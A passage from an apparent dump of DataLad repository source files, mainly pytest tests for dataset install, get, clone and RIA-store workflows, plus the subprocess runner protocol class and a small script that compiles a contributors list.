Therefore first toplevel:\n ds = install(top_path, source=path, recursive=False)\n assert_not_in('annex.hardlink', ds.config)\n ok_(ds.is_installed())\n sub1 = Dataset(opj(top_path, 'subm 1'))\n sub2 = Dataset(opj(top_path, '2'))\n ok_(not sub1.is_installed())\n ok_(not sub2.is_installed())\n\n # fails, when `source` is passed:\n assert_raises(ValueError, ds.install,\n path=['subm 1', '2'],\n source='something')\n\n # now should work:\n result = ds.install(path=['subm 1', '2'], result_xfm='paths')\n ok_(sub1.is_installed())\n ok_(sub2.is_installed())\n eq_(set(result), {sub1.path, sub2.path})\n # and if we request it again via get, result should be empty\n get_result = ds.get(path=['subm 1', '2'], get_data=False)\n assert_status('notneeded', get_result)\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_reckless(path=None, top_path=None):\n _mk_submodule_annex(path, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n ds = install(top_path, source=path, reckless=True)\n eq_(ds.config.get('annex.hardlink', None), 'true')\n eq_(ds.repo.repo_info()['untrusted repositories'][0]['here'], True)\n\n\n@with_tree(tree={'top_file.txt': 'some',\n 'sub 1': {'sub1file.txt': 'something else',\n 'subsub': {'subsubfile.txt': 'completely different',\n }\n },\n 'sub 2': {'sub2file.txt': 'meaningless',\n }\n })\n@with_tempfile(mkdir=True)\ndef test_install_recursive_repeat(src=None, path=None):\n top_src = Dataset(src).create(force=True)\n sub1_src = top_src.create('sub 1', force=True)\n sub2_src = top_src.create('sub 2', force=True)\n subsub_src = sub1_src.create('subsub', force=True)\n top_src.save(recursive=True)\n assert_repo_status(top_src.path)\n\n # install top level:\n top_ds = install(path, source=src)\n ok_(top_ds.is_installed() is True)\n sub1 = Dataset(opj(path, 'sub 1'))\n ok_(sub1.is_installed() is False)\n sub2 = Dataset(opj(path, 'sub 2'))\n ok_(sub2.is_installed() is False)\n subsub = Dataset(opj(path, 'sub 1', 'subsub'))\n ok_(subsub.is_installed() is False)\n\n # install again, now with data and recursive, but recursion_limit 1:\n result = get(path, dataset=path, recursive=True, recursion_limit=1,\n result_xfm='datasets')\n # top-level dataset was not reobtained\n assert_not_in(top_ds, result)\n assert_in(sub1, result)\n assert_in(sub2, result)\n assert_not_in(subsub, result)\n ok_(top_ds.repo.file_has_content('top_file.txt') is True)\n ok_(sub1.repo.file_has_content('sub1file.txt') is True)\n ok_(sub2.repo.file_has_content('sub2file.txt') is True)\n\n # install sub1 again, recursively and with data\n top_ds.install('sub 1', recursive=True, get_data=True)\n ok_(subsub.is_installed())\n ok_(subsub.repo.file_has_content('subsubfile.txt'))\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\n@with_tempfile\ndef test_install_skip_list_arguments(src=None, path=None, path_outside=None):\n _mk_submodule_annex(src, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n ds = install(path, source=src)\n ok_(ds.is_installed())\n\n # install a list with valid and invalid items:\n result = ds.install(\n path=['subm 1', 'not_existing', path_outside, '2'],\n get_data=False,\n on_failure='ignore', result_xfm=None, return_type='list')\n # good and bad results together\n ok_(isinstance(result, list))\n eq_(len(result), 4)\n # check that we have an 'impossible/error' status for both invalid args\n # but all the other tasks have been accomplished\n assert_result_count(\n result, 1, status='impossible', message=\"path does not exist\",\n path=opj(ds.path, 'not_existing'))\n 
assert_result_count(\n result, 1, status='error',\n message=(\"path not associated with dataset %s\", ds),\n path=path_outside)\n for sub in [Dataset(opj(path, 'subm 1')), Dataset(opj(path, '2'))]:\n assert_result_count(\n result, 1, status='ok',\n message=('Installed subdataset in order to get %s', sub.path))\n ok_(sub.is_installed())\n\n # return of get is always a list, by default, even if just one thing was gotten\n # in this case 'subm1' was already obtained above, so this will get this\n # content of the subdataset\n with assert_raises(IncompleteResultsError) as cme:\n ds.install(path=['subm 1', 'not_existing'])\n with assert_raises(IncompleteResultsError) as cme:\n ds.get(path=['subm 1', 'not_existing'])\n\n\n@with_tempfile(mkdir=True)\n@with_tempfile(mkdir=True)\ndef test_install_skip_failed_recursive(src=None, path=None):\n _mk_submodule_annex(src, fname=\"test-annex.dat\", fcontent=\"whatever\")\n\n # install top level:\n ds = install(path, source=src)\n sub1 = Dataset(opj(path, 'subm 1'))\n sub2 = Dataset(opj(path, '2'))\n # sabotage recursive installation of 'subm 1' by polluting the target:\n with open(opj(path, 'subm 1', 'blocking.txt'), \"w\") as f:\n f.write(\"sdfdsf\")\n\n with swallow_logs(new_level=logging.WARNING) as cml:\n result = ds.get(\n os.curdir, recursive=True,\n on_failure='ignore', result_xfm=None)\n # toplevel dataset was in the house already\n assert_result_count(\n result, 0, path=ds.path, type='dataset')\n # subm 1 should fail to install. [1] since comes after '2' submodule\n assert_in_results(\n result, status='error', path=sub1.path, type='dataset',\n message='target path already exists and not empty, refuse to '\n 'clone into target path')\n assert_in_results(result, status='ok', path=sub2.path)\n\n\n@with_tree(tree={'top_file.txt': 'some',\n 'sub 1': {'sub1file.txt': 'something else',\n 'subsub': {'subsubfile.txt': 'completely different',\n }\n },\n 'sub 2': {'sub2file.txt': 'meaningless',\n }\n })\n@with_tempfile(mkdir=True)\ndef test_install_noautoget_data(src=None, path=None):\n subsub_src = Dataset(opj(src, 'sub 1', 'subsub')).create(force=True)\n sub1_src = Dataset(opj(src, 'sub 1')).create(force=True)\n sub2_src = Dataset(opj(src, 'sub 2')).create(force=True)\n top_src = Dataset(src).create(force=True)\n top_src.save(recursive=True)\n\n # install top level:\n # don't filter implicitly installed subdataset to check them for content\n cdss = install(path, source=src, recursive=True, result_filter=None)\n # there should only be datasets in the list of installed items,\n # and none of those should have any data for their annexed files yet\n for ds in cdss:\n ainfo = ds.repo.get_content_annexinfo(init=None,\n eval_availability=True)\n assert_false(any(st[\"has_content\"] for st in ainfo.values()))\n\n\n@with_tempfile\n@with_tempfile\ndef test_install_source_relpath(src=None, dest=None):\n ds1 = create(src)\n src_ = basename(src)\n with chpwd(dirname(src)):\n ds2 = install(dest, source=src_)\n\n\n@known_failure_windows #FIXME\n@integration # 41.2043s\n@with_tempfile\n@with_tempfile\n@with_tempfile\n@with_tempfile\ndef test_install_consistent_state(src=None, dest=None, dest2=None, dest3=None):\n # if we install a dataset, where sub-dataset \"went ahead\" in that branch,\n # while super-dataset was not yet updated (e.g. 
we installed super before)\n # then it is desired to get that default installed branch to get to the\n # position where previous location was pointing to.\n # It is indeed a mere heuristic which might not hold the assumption in some\n # cases, but it would work for most simple and thus mostly used ones\n ds1 = create(src)\n sub1 = ds1.create('sub1')\n\n def check_consistent_installation(ds):\n datasets = [ds] + list(\n map(Dataset, ds.subdatasets(recursive=True, state='present',\n result_xfm='paths')))\n assert len(datasets) == 2 # in this test\n for ds in datasets:\n # all of them should be in the default branch\n eq_(ds.repo.get_active_branch(), DEFAULT_BRANCH)\n # all of them should be clean, so sub should be installed in a \"version\"\n # as pointed by the super\n ok_(not ds.repo.dirty)\n\n dest_ds = install(dest, source=src)\n # now we progress sub1 by adding sub2\n subsub2 = sub1.create('sub2')\n\n # and progress subsub2 forward to stay really thorough\n put_file_under_git(subsub2.path, 'file.dat', content=\"data\")\n subsub2.save(message=\"added a file\") # above function does not commit\n\n # just installing a submodule -- apparently different code/logic\n # but also the same story should hold - we should install the version pointed\n # by the super, and stay all clean\n dest_sub1 = dest_ds.install('sub1')\n check_consistent_installation(dest_ds)\n\n # So now we have source super-dataset \"dirty\" with sub1 progressed forward\n # Our install should try to \"retain\" consistency of the installation\n # whenever possible.\n\n # install entire hierarchy without specifying dataset\n # no filter, we want full report\n dest2_ds = install(dest2, source=src, recursive=True, result_filter=None)\n check_consistent_installation(dest2_ds[0]) # [1] is the subdataset\n\n # install entire hierarchy by first installing top level ds\n # and then specifying sub-dataset\n dest3_ds = install(dest3, source=src, recursive=False)\n # and then install both submodules recursively while pointing\n # to it based on dest3_ds\n dest3_ds.install('sub1', recursive=True)\n check_consistent_installation(dest3_ds)\n\n # TODO: makes a nice use-case for an update operation\n\n\n@skip_ssh\n@with_tempfile\n@with_tempfile\ndef test_install_subds_with_space(opath=None, tpath=None):\n ds = create(opath)\n ds.create('sub ds')\n # works even now, boring\n # install(tpath, source=opath, recursive=True)\n if on_windows:\n # on windows we cannot simply prepend datalad-test: to a path\n # and get a working sshurl...\n install(tpath, source=opath, recursive=True)\n else:\n # do via ssh!\n install(tpath, source=\"datalad-test:\" + opath, recursive=True)\n assert Dataset(opj(tpath, 'sub ds')).is_installed()\n\n\n# https://github.com/datalad/datalad/issues/2232\n@with_tempfile\n@with_tempfile\ndef test_install_from_tilda(opath=None, tpath=None):\n ds = create(opath)\n ds.create('sub ds')\n orelpath = os.path.join(\n '~',\n os.path.relpath(opath, os.path.expanduser('~'))\n )\n assert orelpath.startswith('~') # just to make sure no normalization\n install(tpath, source=orelpath, recursive=True)\n assert Dataset(opj(tpath, 'sub ds')).is_installed()\n\n\n@skip_if_on_windows # create_sibling incompatible with win servers\n@skip_ssh\n@usecase\n@with_tempfile(mkdir=True)\ndef test_install_subds_from_another_remote(topdir=None):\n # https://github.com/datalad/datalad/issues/1905\n from datalad.support.network import PathRI\n with chpwd(topdir):\n origin_ = 'origin'\n clone1_ = 'clone1'\n clone2_ = 'clone2'\n\n origin = create(origin_, 
annex=False)\n clone1 = install(source=origin, path=clone1_)\n # print(\"Initial clone\")\n clone1.create_sibling('ssh://datalad-test%s/%s' % (PathRI(getpwd()).posixpath, clone2_), name=clone2_)\n\n # print(\"Creating clone2\")\n clone1.push(to=clone2_)\n clone2 = Dataset(clone2_)\n # print(\"Initiating subdataset\")\n clone2.create('subds1')\n\n # print(\"Updating\")\n clone1.update(merge=True, sibling=clone2_)\n # print(\"Installing within updated dataset -- should be able to install from clone2\")\n clone1.install('subds1')\n\n\n# Takes > 2 sec\n# Do not use cassette\[email protected](\"suffix\", [\"\", \"/.git\"])\n@skip_if_no_network\n@with_tempfile\ndef test_datasets_datalad_org(tdir=None, *, suffix):\n # Test that git annex / datalad install, get work correctly on our datasets.datalad.org\n # Apparently things can break, especially with introduction of the\n # smart HTTP backend for apache2 etc\n ds = install(tdir, source='///dicoms/dartmouth-phantoms/bids_test6-PD+T2w' + suffix)\n eq_(ds.config.get(f'remote.{DEFAULT_REMOTE}.annex-ignore', None),\n None)\n # assert_result_count and not just assert_status since for some reason on\n # Windows we get two records due to a duplicate attempt (as res[1]) to get it\n # again, which is reported as \"notneeded\". For the purpose of this test\n # it doesn't make a difference.\n assert_result_count(\n ds.get(op.join('001-anat-scout_ses-{date}', '000001.dcm')),\n 1,\n status='ok')\n assert_status('ok', ds.drop(what='all', reckless='kill', recursive=True))\n\n\n# https://github.com/datalad/datalad/issues/3469\n@with_tempfile(mkdir=True)\ndef test_relpath_semantics(path=None):\n with chpwd(path):\n super = create('super')\n create('subsrc')\n sub = install(\n dataset='super', source='subsrc', path=op.join('super', 'sub'))\n eq_(sub.path, op.join(super.path, 'sub'))\n\n\n@with_tempfile(mkdir=True)\n@serve_path_via_http\ndef test_install_branch(path=None, url=None):\n path = Path(path)\n ds_a = create(path / \"ds_a\")\n ds_a.create(\"sub\")\n\n repo_a = ds_a.repo\n repo_a.commit(msg=\"c1\", options=[\"--allow-empty\"])\n repo_a.checkout(DEFAULT_BRANCH + \"-other\", [\"-b\"])\n repo_a.commit(msg=\"c2\", options=[\"--allow-empty\"])\n repo_a.checkout(DEFAULT_BRANCH)\n\n # Clone from URL with custom branch specified should work\n assert ds_a.repo.call_git_success(['update-server-info'])\n tmp_path = path / \"tmp\"\n os.mkdir(tmp_path)\n with chpwd(tmp_path):\n ds_b = install(url + \"ds_a/.git\", branch=DEFAULT_BRANCH + \"-other\")\n repo_b = ds_b.repo\n eq_(repo_b.get_corresponding_branch() or repo_b.get_active_branch(),\n DEFAULT_BRANCH + \"-other\")\n\n ds_b = install(source=ds_a.path, path=str(path / \"ds_b\"),\n branch=DEFAULT_BRANCH + \"-other\", recursive=True)\n\n repo_b = ds_b.repo\n eq_(repo_b.get_corresponding_branch() or repo_b.get_active_branch(),\n DEFAULT_BRANCH + \"-other\")\n\n repo_sub = Dataset(ds_b.pathobj / \"sub\").repo\n eq_(repo_sub.get_corresponding_branch() or repo_sub.get_active_branch(),\n DEFAULT_BRANCH)\n\n\ndef _create_test_install_recursive_github(path): # pragma: no cover\n # to be ran once to populate a hierarchy of test datasets on github\n # Making it a full round-trip would require github credentials on CI etc\n ds = create(opj(path, \"testrepo gh\"))\n # making them with spaces and - to ensure that we consistently use the mapping\n # for create and for get/clone/install\n ds.create(\"sub _1\")\n ds.create(\"sub _1/d/sub_- 1\")\n import datalad.distribution.create_sibling_github # to bind API\n 
ds.create_sibling_github(\n \"testrepo gh\",\n github_organization='datalad',\n recursive=True,\n # yarik forgot to push first, \"replace\" is not working in non-interactive IIRC\n # existing='reconfigure'\n )\n return ds.push(recursive=True, to='github')\n\n\n@skip_if_no_network\n@with_tempfile(mkdir=True)\ndef test_install_recursive_github(path=None):\n # test recursive installation of a hierarchy of datasets created on github\n # using datalad create-sibling-github. Following invocation was used to poplate it\n #\n # out = _create_test_install_recursive_github(path)\n\n # \"testrepo gh\" was mapped by our sanitization in create_sibling_github to testrepo_gh, thus\n for i, url in enumerate([\n 'https://github.com/datalad/testrepo_gh',\n # optionally made available to please paranoids, but with all takes too long (22sec)\n #'https://github.com/datalad/testrepo_gh.git',\n #'[email protected]:datalad/testrepo_gh.git',\n ]):\n ds = install(source=url, path=opj(path, \"clone%i\" % i), recursive=True)\n eq_(len(ds.subdatasets(recursive=True, state='present')), 2)\n" }, { "alpha_fraction": 0.6244897842407227, "alphanum_fraction": 0.6270871758460999, "avg_line_length": 33.11392593383789, "blob_id": "46c819857730e4d16d5afb345a4a9f12ed793704", "content_id": "35fbae5888126257e277102a374a3b34c75e343e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2695, "license_type": "permissive", "max_line_length": 79, "num_lines": 79, "path": "/datalad/distributed/tests/test_ria.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "\"\"\"Test workflow (pieces) for RIA stores\"\"\"\n\nfrom datalad.api import (\n Dataset,\n clone,\n)\nfrom datalad.tests.utils_pytest import (\n DEFAULT_REMOTE,\n assert_equal,\n assert_result_count,\n assert_true,\n has_symlink_capability,\n skip_if,\n skip_if_on_windows,\n with_tempfile,\n with_tree,\n)\nfrom datalad.utils import Path\n\n\n@skip_if_on_windows # currently all tests re RIA/ORA don't run on windows\n@skip_if(cond=not has_symlink_capability(),\n msg=\"skip testing ephemeral clone w/o symlink capabilities\")\n@with_tree({'file1.txt': 'some',\n 'sub': {'other.txt': 'other'}})\n@with_tempfile\n@with_tempfile\ndef test_ephemeral(ds_path=None, store_path=None, clone_path=None):\n\n dspath = Path(ds_path)\n store = Path(store_path)\n file_test = Path('file1.txt')\n file_testsub = Path('sub') / 'other.txt'\n\n\n # create the original dataset\n ds = Dataset(dspath)\n ds.create(force=True)\n ds.save()\n\n # put into store:\n ds.create_sibling_ria(\"ria+{}\".format(store.as_uri()), \"riastore\",\n new_store_ok=True)\n ds.push(to=\"riastore\", data=\"anything\")\n\n # now, get an ephemeral clone from the RIA store:\n eph_clone = clone('ria+{}#{}'.format(store.as_uri(), ds.id), clone_path,\n reckless=\"ephemeral\")\n\n # ephemeral clone was properly linked (store has bare repos!):\n clone_annex = (eph_clone.repo.dot_git / 'annex')\n assert_true(clone_annex.is_symlink())\n assert_true(clone_annex.resolve().samefile(\n store / ds.id[:3] / ds.id[3:] / 'annex'))\n if not eph_clone.repo.is_managed_branch():\n # TODO: We can't properly handle adjusted branch yet\n # we don't need to get files in order to access them:\n assert_equal((eph_clone.pathobj / file_test).read_text(), \"some\")\n assert_equal((eph_clone.pathobj / file_testsub).read_text(), \"other\")\n\n # can we unlock those files?\n eph_clone.unlock(file_test)\n # change content\n (eph_clone.pathobj / file_test).write_text(\"new 
content\")\n eph_clone.save()\n\n # new content should already be in store\n # (except the store doesn't know yet)\n res = eph_clone.repo.fsck(remote=\"riastore-storage\", fast=True)\n assert_equal(len(res), 2)\n assert_result_count(res, 1, success=True, file=file_test.as_posix())\n assert_result_count(res, 1, success=True, file=file_testsub.as_posix())\n\n # push back git history\n eph_clone.push(to=DEFAULT_REMOTE, data=\"nothing\")\n\n # get an update in origin\n ds.update(merge=True, reobtain_data=True)\n assert_equal((ds.pathobj / file_test).read_text(), \"new content\")\n" }, { "alpha_fraction": 0.6849641799926758, "alphanum_fraction": 0.6849641799926758, "avg_line_length": 37.09090805053711, "blob_id": "50e2d210dcdf8fbdec03e517894af3afe88b7890", "content_id": "d0febed7b18a7d019da3e22be141e41f56c34bc8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 419, "license_type": "permissive", "max_line_length": 77, "num_lines": 11, "path": "/tools/mkcontrib", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "#!/bin/sh\n\necho \"The following people have contributed to DataLad:\" > CONTRIBUTORS\necho >> CONTRIBUTORS\n\n# note: some exclusions to clean up botched git author tags that got fixed in\n# later commits, hopefully we'll be more careful about this in the future\ngit log --format='%aN' | sort | uniq \\\n | grep -E -v \\\n -e 'Mr.Nobody' -e unknown -e 'DataLad Tester' -e '^blah' -e Yarchael \\\n | sort >> CONTRIBUTORS\n" }, { "alpha_fraction": 0.6110148429870605, "alphanum_fraction": 0.6127475500106812, "avg_line_length": 36.58139419555664, "blob_id": "649a8044ecd255e21df43d4b6a6802d9f8736973", "content_id": "1526d9ce970d2e190f3510d8dda329e0f1985a54", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8080, "license_type": "permissive", "max_line_length": 106, "num_lines": 215, "path": "/datalad/runner/protocol.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Base class of a protocol to be used with the DataLad runner\n\"\"\"\n\nfrom __future__ import annotations\n\nimport logging\nimport subprocess\nimport warnings\nfrom collections import deque\nfrom locale import getpreferredencoding\nfrom typing import (\n Any,\n Optional,\n)\n\nfrom datalad.utils import ensure_unicode\n\nfrom .exception import CommandError\n\nlgr = logging.getLogger('datalad.runner.protocol')\n\n\nclass GeneratorMixIn:\n \"\"\" Protocol mix in that will instruct runner.run to return a generator\n\n When this class is in the parent of a protocol given to runner.run (and\n some other functions/methods) the run-method will return a `Generator`,\n which yields whatever the protocol callbacks send to the `Generator`,\n via the `send_result`-method of this class.\n\n This allows to use runner.run() in constructs like:\n\n for result in runner.run(...):\n # do something, for example write to stdin of the subprocess\n\n \"\"\"\n def __init__(self):\n self.result_queue = deque()\n\n def send_result(self, result):\n 
self.result_queue.append(result)\n\n\nclass WitlessProtocol:\n \"\"\"Subprocess communication protocol base class for `run_async_cmd`\n\n This class implements basic subprocess output handling. Derived classes\n like `StdOutCapture` should be used for subprocess communication that need\n to capture and return output. In particular, the `pipe_data_received()`\n method can be overwritten to implement \"online\" processing of process\n output.\n\n This class defines a default return value setup that causes\n `run_async_cmd()` to return a 2-tuple with the subprocess's exit code\n and a list with bytestrings of all captured output streams.\n \"\"\"\n\n proc_out = False\n proc_err = False\n\n def __init__(self, done_future: Any = None, encoding: Optional[str] = None) -> None:\n \"\"\"\n Parameters\n ----------\n done_future: Any\n Ignored parameter, kept for backward compatibility (DEPRECATED)\n encoding : str\n Encoding to be used for process output bytes decoding. By default,\n the preferred system encoding is guessed.\n \"\"\"\n\n if done_future is not None:\n warnings.warn(\"`done_future` argument is ignored \"\n \"and will be removed in a future release\",\n DeprecationWarning)\n\n self.fd_infos: dict[int, tuple[str, Optional[bytearray]]] = {}\n\n self.process: Optional[subprocess.Popen] = None\n self.stdout_fileno = 1\n self.stderr_fileno = 2\n\n # capture output in bytearrays while the process is running\n self.fd_infos[self.stdout_fileno] = (\"stdout\", bytearray()) if self.proc_out else (\"stdout\", None)\n self.fd_infos[self.stderr_fileno] = (\"stderr\", bytearray()) if self.proc_err else (\"stderr\", None)\n\n super().__init__()\n self.encoding = encoding or getpreferredencoding(do_setlocale=False)\n\n self._log_outputs = False\n if lgr.isEnabledFor(5):\n try:\n from datalad import cfg\n self._log_outputs = cfg.getbool('datalad.log', 'outputs', default=False)\n except ImportError:\n pass\n self._log = self._log_summary\n else:\n self._log = self._log_nolog\n\n def _log_nolog(self, fd: int, data: str | bytes) -> None:\n pass\n\n def _log_summary(self, fd: int, data: str | bytes) -> None:\n fd_name = self.fd_infos[fd][0]\n assert self.process is not None\n lgr.log(5, 'Read %i bytes from %i[%s]%s',\n len(data), self.process.pid, fd_name, ':' if self._log_outputs else '')\n if self._log_outputs:\n log_data = ensure_unicode(data)\n # The way we log is to stay consistent with Runner.\n # TODO: later we might just log in a single entry, without\n # fd_name prefix\n lgr.log(5, \"%s| %s \", fd_name, log_data)\n\n def connection_lost(self, exc: Optional[BaseException]) -> None:\n \"\"\"Called when the connection is lost or closed.\n\n The argument is an exception object or None (the latter\n meaning a regular EOF is received or the connection was\n aborted or closed).\n \"\"\"\n\n def connection_made(self, process: subprocess.Popen) -> None:\n self.process = process\n lgr.log(8, 'Process %i started', self.process.pid)\n\n def pipe_connection_lost(self, fd: int, exc: Optional[BaseException]) -> None:\n \"\"\"Called when a file descriptor associated with the child process is\n closed.\n\n fd is the int file descriptor that was closed.\n \"\"\"\n\n def pipe_data_received(self, fd: int, data: bytes) -> None:\n self._log(fd, data)\n # Store received output if stream was to be captured.\n fd_name, buffer = self.fd_infos[fd]\n if buffer is not None:\n buffer.extend(data)\n\n def timeout(self, fd: Optional[int]) -> bool:\n \"\"\"\n Called if the timeout parameter to WitlessRunner.run()\n is not `None` 
and a process file descriptor could not\n be read (stdout or stderr) or not be written (stdin)\n within the specified time in seconds, or if waiting for\n a subprocess to exit takes longer than the specified time.\n\n stdin timeouts are only caught when the type of the `stdin`-\n parameter to WitlessRunner.run() is either a `Queue`,\n a `str`, or `bytes`. `Stdout` or `stderr` timeouts\n are only caught of proc_out and proc_err are `True` in the\n protocol class. Process wait timeouts are\n always caught if `timeout` is not `None`. In this case the\n `fd`-argument will be `None`.\n\n fd:\n The file descriptor that timed out or `None` if no\n progress was made at all, i.e. no stdin element was\n enqueued and no output was read from either stdout\n or stderr.\n\n return:\n If the callback returns `True`, the file descriptor\n (if any was given) will be closed and no longer monitored.\n If the return values is anything else than `True`,\n the file-descriptor will be monitored further\n and additional timeouts might occur indefinitely.\n If `None` was given, i.e. a process runtime-timeout\n was detected, and `True` is returned, the process\n will be terminated.\n \"\"\"\n return False\n\n def _prepare_result(self) -> dict:\n \"\"\"Prepares the final result to be returned to the runner\n\n Note for derived classes overwriting this method:\n\n The result must be a dict with keys that do not unintentionally\n conflict with the API of CommandError, as the result dict is passed to\n this exception class as kwargs on error. The Runner will overwrite\n 'cmd' and 'cwd' on error, if they are present in the result.\n \"\"\"\n assert self.process is not None\n return_code = self.process.poll()\n if return_code is None:\n raise CommandError(\n msg=f\"Got None as a return_code for the process {self.process.pid}\")\n lgr.log(\n 8,\n 'Process %i exited with return code %i',\n self.process.pid, return_code)\n # give captured process output back to the runner as string(s)\n results: dict[str, Any] = {\n name: (\n bytes(byt).decode(self.encoding)\n if byt is not None\n else '')\n for name, byt in self.fd_infos.values()\n }\n results['code'] = return_code\n return results\n\n def process_exited(self) -> None:\n pass\n" }, { "alpha_fraction": 0.5562422871589661, "alphanum_fraction": 0.5636588335037231, "avg_line_length": 34.130435943603516, "blob_id": "e34127a117616c4b2a7d3dd5b4229a3569f8b861", "content_id": "60df60b0148b41cea6e33fa504efd5bc7c01f099", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 809, "license_type": "permissive", "max_line_length": 87, "num_lines": 23, "path": "/datalad/tests/__init__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport os\nimport shutil\nimport tempfile\nfrom logging import getLogger\n\nlgr = getLogger(\"datalad.tests\")\n\n# We will delay generation of some test files/directories until they are\n# actually used but then would remove them here\n_TEMP_PATHS_GENERATED = []\n\n# Give a custom template so we could hunt them down easily\ntempfile.template = 
os.path.join(tempfile.gettempdir(),\n 'tmp-page2annex')\n\n" }, { "alpha_fraction": 0.5491803288459778, "alphanum_fraction": 0.5537340641021729, "avg_line_length": 29.5, "blob_id": "672cf65890335dc9959b1e80ebd591c1b011dbf0", "content_id": "e21d78323f2025b33d12fe55c80a2224d5448ac6", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1098, "license_type": "permissive", "max_line_length": 87, "num_lines": 36, "path": "/datalad/tests/test__main__.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\nimport sys\nfrom io import StringIO\nfrom unittest.mock import patch\n\nfrom datalad.tests.utils_pytest import (\n assert_equal,\n assert_raises,\n)\n\nfrom .. import (\n __main__,\n __version__,\n)\n\n\n@patch('sys.stdout', new_callable=StringIO)\ndef test_main_help(stdout=None):\n assert_raises(SystemExit, __main__.main, ['__main__.py', '--help'])\n assert(\n stdout.getvalue().startswith(\n \"Usage: %s -m datalad [OPTIONS] <file> [ARGS]\\n\" % sys.executable\n ))\n\n@patch('sys.stdout', new_callable=StringIO)\ndef test_main_version(stdout=None):\n assert_raises(SystemExit, __main__.main, ['__main__.py', '--version'])\n assert_equal(stdout.getvalue().rstrip(), \"datalad %s\" % __version__)\n" }, { "alpha_fraction": 0.5277044773101807, "alphanum_fraction": 0.5343008041381836, "avg_line_length": 25.13793182373047, "blob_id": "38c60f5d2d3733b2ceef37aad4aa5970a2752075", "content_id": "7c787e200ad95aa5eb613fbcfe2963336641d4a8", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 758, "license_type": "permissive", "max_line_length": 79, "num_lines": 29, "path": "/datalad/distributed/tests/test_create_sibling_github.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Test create publication target on GitHub\"\"\"\n\n\nfrom datalad.api import create_sibling_github\nfrom datalad.tests.utils_pytest import (\n skip_if_no_network,\n with_tempfile,\n)\n\nfrom .test_create_sibling_ghlike import check4real\n\n\n@skip_if_no_network\n@with_tempfile\ndef test_github(path=None):\n check4real(\n create_sibling_github,\n path,\n 'github',\n 'https://api.github.com',\n 'repos/dataladtester/{reponame}',\n )\n" }, { "alpha_fraction": 0.6133614182472229, "alphanum_fraction": 0.6329728960990906, "avg_line_length": 35.864864349365234, "blob_id": "387cecdd9d58041c961f766d5c7a7e99a67db821", "content_id": "791bc06351ec4083a4dd05259397d02a6c41fc9e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 10912, "license_type": "permissive", "max_line_length": 116, "num_lines": 296, "path": "/datalad/customremotes/tests/test_archives.py", "repo_name": "datalad/datalad", 
"src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Tests for customremotes archives providing dl+archive URLs handling\"\"\"\n\nimport glob\nimport logging\nimport os\nimport os.path as op\nimport sys\nfrom time import sleep\nfrom unittest.mock import patch\n\nfrom datalad.api import Dataset\nfrom datalad.cmd import (\n GitWitlessRunner,\n KillOutput,\n StdOutErrCapture,\n WitlessRunner,\n)\nfrom datalad.support.exceptions import CommandError\n\nfrom ...consts import ARCHIVES_SPECIAL_REMOTE\nfrom ...support.annexrepo import AnnexRepo\nfrom ...tests.test_archives import (\n fn_archive_obscure,\n fn_archive_obscure_ext,\n fn_in_archive_obscure,\n)\nfrom ...tests.utils_pytest import (\n abspath,\n assert_equal,\n assert_false,\n assert_not_equal,\n assert_not_in,\n assert_raises,\n assert_true,\n chpwd,\n eq_,\n in_,\n known_failure_githubci_win,\n ok_,\n 